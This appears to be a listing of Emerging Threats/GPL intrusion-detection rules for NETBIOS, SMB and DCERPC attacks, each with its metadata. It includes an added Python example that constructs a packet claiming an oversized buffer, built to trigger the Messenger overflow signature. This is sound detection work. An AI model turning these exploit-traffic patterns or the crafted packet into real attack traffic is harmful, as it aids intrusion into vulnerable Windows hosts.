#alert udp $EXTERNAL_NET any -> $HOME_NET 137 (msg:"GPL NETBIOS name query overflow attempt UDP"; byte_test:1,&,64,2; content:" "; offset:12; isdataat:56,relative; reference:bugtraq,9624; reference:cve,2003-0825; classtype:attempted-admin; sid:2103196; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : name query overflow attempt UDP

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9624|cve,2003-0825

CVE reference : CVE-2003-0825

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103200

#alert udp $EXTERNAL_NET any -> $HOME_NET 42 (msg:"GPL NETBIOS WINS name query overflow attempt UDP"; byte_test:1,&,64,2; content:" "; offset:12; isdataat:56,relative; reference:bugtraq,9624; reference:cve,2003-0825; reference:url,www.microsoft.com/technet/security/bulletin/MS04-006.mspx; classtype:attempted-admin; sid:2103200; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : WINS name query overflow attempt UDP

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9624|cve,2003-0825|url,www.microsoft.com/technet/security/bulletin/MS04-006.mspx

CVE reference : CVE-2003-0825

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103235

#alert udp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS Messenger message overflow attempt"; content:"|04 00|"; depth:2; byte_test:1,!&,16,2,relative; content:"|F8 91|{Z|00 FF D0 11 A9 B2 00 C0|O|B6 E6 FC|"; within:16; distance:22; content:"|00 00|"; within:2; distance:28; byte_jump:4,18,align,relative; byte_jump:4,8,align,relative; byte_test:4,>,1024,8,relative; reference:bugtraq,8826; reference:cve,2003-0717; classtype:attempted-admin; sid:2103235; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : Messenger message overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8826|cve,2003-0717

CVE reference : CVE-2003-0717

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103234

#alert udp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS Messenger message little endian overflow attempt"; content:"|04 00|"; depth:2; byte_test:1,&,16,2,relative; content:"|F8 91|{Z|00 FF D0 11 A9 B2 00 C0|O|B6 E6 FC|"; within:16; distance:22; content:"|00 00|"; within:2; distance:28; byte_jump:4,18,little,align,relative; byte_jump:4,8,little,align,relative; byte_test:4,>,1024,8,little,relative; reference:bugtraq,8826; reference:cve,2003-0717; classtype:attempted-admin; sid:2103234; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : Messenger message little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8826|cve,2003-0717

CVE reference : CVE-2003-0717

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102349

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC enumerate printers request attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; fast_pattern; within:12; distance:5; nocase; content:"|05|"; distance:1; content:"|00|"; within:1; distance:1; byte_test:1,&,3,0,relative; content:"|00 00|"; within:2; distance:19; flowbits:isset,dce.printer.bind; classtype:attempted-recon; sid:2102349; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC enumerate printers request attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102348

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC print spool bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00 05 00 0B|"; within:17; distance:5; byte_test:1,&,16,1,relative; content:"xV4|12|4|12 CD AB EF 00 01 23|Eg|89 AB|"; within:16; distance:29; flowbits:set,dce.printer.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2102348; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC print spool bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102316

alert udp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"GPL NETBIOS DCERPC Workstation Service direct service access attempt"; content:"|04 00|"; depth:2; byte_test:1,&,16,2,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:22; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102316; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC Workstation Service direct service access attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : CVE-2003-0812

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102315

alert tcp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"GPL NETBIOS DCERPC Workstation Service direct service bind attempt"; flow:to_server,established; content:"|05 00 0B|"; depth:3; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102315; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC Workstation Service direct service bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : CVE-2003-0812

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102311

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Workstation Service bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102311; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC Workstation Service bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : CVE-2003-0812

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102310

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Workstation Service unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102310; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC Workstation Service unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : CVE-2003-0812

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102309

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC Workstation Service bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,^,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00 05 00 0B|"; within:10; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102309; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC Workstation Service bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : CVE-2003-0812

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102308

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB DCERPC Workstation Service unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"|98 D0 FF|k|12 A1 10|6|98|3F|C3 F8|~4Z"; within:16; distance:29; reference:bugtraq,9011; reference:cve,2003-0812; reference:url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx; classtype:misc-attack; sid:2102308; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC Workstation Service unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,9011|cve,2003-0812|url,www.microsoft.com/technet/security/bulletin/MS03-049.mspx

CVE reference : CVE-2003-0812

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102258

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Messenger Service buffer overflow attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|04 00|"; within:2; byte_test:1,>,15,2,relative; byte_jump:4,86,little,align,relative; byte_jump:4,8,little,align,relative; byte_test:4,>,1024,0,little,relative; reference:bugtraq,8826; reference:cve,2003-0717; reference:nessus,11888; reference:nessus,11890; reference:url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx; classtype:attempted-admin; sid:2102258; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC Messenger Service buffer overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8826|cve,2003-0717|nessus,11888|nessus,11890|url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx

CVE reference : CVE-2003-0717

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102257

alert udp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC Messenger Service buffer overflow attempt"; content:"|04 00|"; depth:2; byte_test:1,>,15,2,relative; byte_jump:4,86,little,align,relative; byte_jump:4,8,little,align,relative; byte_test:4,>,1024,0,little,relative; reference:bugtraq,8826; reference:cve,2003-0717; reference:nessus,11888; reference:nessus,11890; reference:url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx; classtype:attempted-admin; sid:2102257; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC Messenger Service buffer overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8826|cve,2003-0717|nessus,11888|nessus,11890|url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx

CVE reference : CVE-2003-0717

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined
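sid 2102257 above (and its SMB twin 2102258) never compares an interface UUID: it checks the connectionless RPC header, then walks the request stub with two byte_jumps and tests a single length field. What follows is an added example, not part of the ET/GPL ruleset or of Snort/Suricata. It reproduces that walk in Python over a constructed RPC v4 connectionless request and also extracts the interface UUID at offset 24 that sid 2102316 and 2103235 compare (distance:22 from byte 2). The reading of the stub as three NDR conformant-varying string arguments, the sample strings, the claimed max_count of 4096, and the filler opnum and activity UUID are this example's assumptions, not anything the rules state.

```python
"""Replay the connectionless (UDP 135) checks of sid 2102257 and 2102316.

Added example, not from the ET/GPL ruleset.  The three-string stub layout is
this example's reading of the rule's byte_jump sequence; samples are constructed.
"""
import struct
import uuid

CL_HEADER_LEN = 80      # RPC v4 connectionless header
CL_IFACE_OFFSET = 24    # interface UUID: content ... within:16; distance:22 from byte 2

# Messenger interface bytes copied from sid 2103235's content string.
MSGSVC_IFACE = bytes.fromhex("F8917B5A00FFD011A9B200C04FB6E6FC")


def align4(n: int) -> int:
    """byte_jump's `align` modifier: round the jump value up to a 4-byte boundary."""
    return (n + 3) & ~3


def ndr_string(s: bytes, max_count=None) -> bytes:
    """NDR conformant-varying string: max_count, offset, actual_count, chars, pad to 4."""
    data = s + b"\x00"
    max_count = len(data) if max_count is None else max_count
    return struct.pack("<III", max_count, 0, len(data)) + data + b"\x00" * ((-len(data)) % 4)


def build_cl_request(iface: bytes, stub: bytes, little_endian: bool = True) -> bytes:
    """Constructed CL request: vers 4, ptype 0 (request), drep, nil object UUID,
    interface UUID at 24, filler activity UUID, counters, then the stub."""
    drep = b"\x10\x00\x00" if little_endian else b"\x00\x00\x00"
    hdr = struct.pack("<BBBB", 4, 0, 0, 0) + drep + b"\x00"     # vers, ptype, flags1/2, drep, serial_hi
    hdr += b"\x00" * 16 + iface + b"\x11" * 16                    # object, interface, activity UUIDs
    # server_boot, if_vers, seqnum, opnum (filler), ihint, ahint, len, fragnum, auth_proto, serial_lo
    hdr += struct.pack("<IIIHHHHHBB", 0, 1, 1, 0, 0xFFFF, 0xFFFF, len(stub), 0, 0, 0)
    assert len(hdr) == CL_HEADER_LEN
    return hdr + stub


def cl_interface(pkt: bytes) -> str:
    """UUID the `direct service access` rules compare at offset 24 (NDR fields are little-endian)."""
    return str(uuid.UUID(bytes_le=pkt[CL_IFACE_OFFSET:CL_IFACE_OFFSET + 16]))


def messenger_overflow_check(pkt: bytes, limit: int = 1024) -> dict:
    """sid 2102257 step by step:
       content:"|04 00|"; depth:2              -> CL header, ptype request; cursor at byte 2
       byte_test:1,>,15,2,relative             -> drep byte (offset 4) > 15: little-endian bit
       byte_jump:4,86,little,align,relative    -> actual_count of string 1 at 88; skip its chars
       byte_jump:4,8,little,align,relative     -> actual_count of string 2; skip its chars
       byte_test:4,>,1024,0,little,relative    -> max_count of string 3 over the limit
    """
    try:
        if pkt[:2] != b"\x04\x00" or not pkt[4] > 15:
            return {"match": False, "reason": "header test failed"}
        cur = 2
        n1 = struct.unpack_from("<I", pkt, cur + 86)[0]
        cur = cur + 86 + 4 + align4(n1)      # Snort jumps from the end of the bytes it read
        n2 = struct.unpack_from("<I", pkt, cur + 8)[0]
        cur = cur + 8 + 4 + align4(n2)
        third_max = struct.unpack_from("<I", pkt, cur)[0]
    except (IndexError, struct.error):
        return {"match": False, "reason": "packet too short for the walk"}
    return {"match": third_max > limit, "third_max_count": third_max, "offset": cur}


# Constructed samples: same from/to strings, different claimed size for the text argument.
BENIGN = build_cl_request(
    MSGSVC_IFACE, ndr_string(b"ALERT") + ndr_string(b"WORKSTATION") + ndr_string(b"hello"))
OVERFLOW = build_cl_request(
    MSGSVC_IFACE, ndr_string(b"ALERT") + ndr_string(b"WORKSTATION") + ndr_string(b"A" * 64, max_count=4096))

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN), ("overflow", OVERFLOW)):
        print(label, cl_interface(pkt), messenger_overflow_check(pkt))
```

Running the file prints the Messenger interface UUID (5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc, decoded from the rule's own bytes) and shows that the walk lands on byte 124 in the sample, where only the packet claiming max_count 4096 crosses the rule's 1024 threshold. Because the rule tests the declared max_count rather than the bytes actually present, a short packet that merely claims a large buffer also fires it, which is the trade-off the signature makes.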

2102252

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC Remote Activation bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx; classtype:attempted-admin; sid:2102252; rev:15; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC Remote Activation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8234|bugtraq,8458|cve,2003-0528|cve,2003-0605|cve,2003-0715|nessus,11798|nessus,11835|url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx

CVE reference : CVE-2003-0528|CVE-2003-0605|CVE-2003-0715

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 15

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102251

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC Remote Activation bind attempt"; flow:to_server,established; content:"|05|"; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; tag:session,5,packets; reference:bugtraq,8234; reference:bugtraq,8458; reference:cve,2003-0528; reference:cve,2003-0605; reference:cve,2003-0715; reference:nessus,11798; reference:nessus,11835; reference:url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx; classtype:attempted-admin; sid:2102251; rev:16; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC Remote Activation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,8234|bugtraq,8458|cve,2003-0528|cve,2003-0605|cve,2003-0715|nessus,11798|nessus,11835|url,www.microsoft.com/technet/security/bulletin/MS03-039.mspx

CVE reference : CVE-2003-0528|CVE-2003-0605|CVE-2003-0715

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 16

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102193

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind.call.attempt; reference:bugtraq,8205; reference:cve,2003-0352; reference:nessus,11808; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2102193; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC ISystemActivator bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,8205|cve,2003-0352|nessus,11808|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : CVE-2003-0352

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102192

#alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|05|"; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind.attempt; flowbits:noalert; reference:bugtraq,8205; reference:cve,2003-0352; reference:nessus,11808; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2102192; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC ISystemActivator bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,8205|cve,2003-0352|nessus,11808|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102191

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB DCERPC invalid bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:2; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|00|"; within:1; distance:21; classtype:attempted-dos; sid:2102191; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB DCERPC invalid bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102190

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC invalid bind attempt"; flow:to_server,established; content:"|05|"; depth:1; content:"|0B|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|00|"; within:1; distance:21; classtype:attempted-dos; sid:2102190; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC invalid bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102177

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB startup folder unicode access"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"|5C 00|S|00|t|00|a|00|r|00|t|00| |00|M|00|e|00|n|00|u|00 5C 00|P|00|r|00|o|00|g|00|r|00|a|00|m|00|s|00 5C 00|S|00|t|00|a|00|r|00|t|00|u|00|p"; distance:0; nocase; classtype:attempted-recon; sid:2102177; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB startup folder unicode access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102176

alert tcp any any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB startup folder access"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"Documents and Settings|5C|All Users|5C|Start Menu|5C|Programs|5C|Startup|00|"; distance:0; nocase; classtype:attempted-recon; sid:2102176; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB startup folder access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102103

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB trans2open buffer overflow attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"|00 14|"; depth:2; offset:60; byte_test:2,>,256,0,relative,little; reference:bugtraq,7294; reference:cve,2003-0201; reference:url,www.digitaldefense.net/labs/advisories/DDI-1013.txt; classtype:attempted-admin; sid:2102103; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB trans2open buffer overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,7294|cve,2003-0201|url,www.digitaldefense.net/labs/advisories/DDI-1013.txt

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102102

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB SMB_COM_TRANSACTION Max Data Count of 0 DOS Attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; content:"|00 00|"; depth:2; offset:45; reference:bugtraq,5556; reference:cve,2002-0724; reference:url,www.corest.com/common/showdoc.php?idx=262; reference:url,www.microsoft.com/technet/security/bulletin/MS02-045.mspx; reference:nessus,11110; classtype:denial-of-service; sid:2102102; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB SMB_COM_TRANSACTION Max Data Count of 0 DOS Attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : denial-of-service

URL reference : bugtraq,5556|cve,2002-0724|url,www.corest.com/common/showdoc.php?idx=262|url,www.microsoft.com/technet/security/bulletin/MS02-045.mspx|nessus,11110

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102101

